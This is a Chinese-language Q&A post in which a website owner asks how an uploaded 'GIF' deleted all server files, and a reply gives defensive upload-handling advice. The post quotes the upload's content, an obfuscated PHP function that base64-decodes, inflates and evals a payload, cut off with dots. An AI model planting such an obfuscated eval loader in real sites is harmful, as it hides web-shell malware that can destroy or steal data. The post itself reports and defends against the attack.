我有一个Linux服务器,我有一个上传图像在我的网站,注册用户可以上传他的图片,当他登录到他的个人资料,他可以看到他的图像,他也可以得到他的形象的URL链接,所以图像上传到WWW/img目录中的服务器 我检查在PHP文件的扩展名,只允许(.png,.gif,.jpg)文件什么是缺陷,必须在文件上传
但我不知道为什么有人上传了一个GIF图像并删除了我的所有文件,我得到了由用户上传的图像,因为我们有RAID,图像的内容有点像.... ...
function vUMmFr($MkUOmK){$MkUOmK=gzinflate(base64_decode($MkUOmK));for($i=0;$i<strlen($MkUOmK);$i++){$MkUOmK[$i]=chr(ord($MkUOmK[$i])-1)}return $MkUOmK}eval(vUMmFr("7b1pe+M2sij8ved55j............
这是怎么回事,这是怎么发生的,所有的文件如何被删除? 什么语言是这样的,我怎么能防止删除文件..
切勿允许用户上传的文档在doc根目录下。决不允许用户上传的文件在磁盘上被命名为其原始名称。命名没有文件扩展名的文件。永远不要相信原始文件名来确定文件类型。设置合理的上传大小限制。 – Brad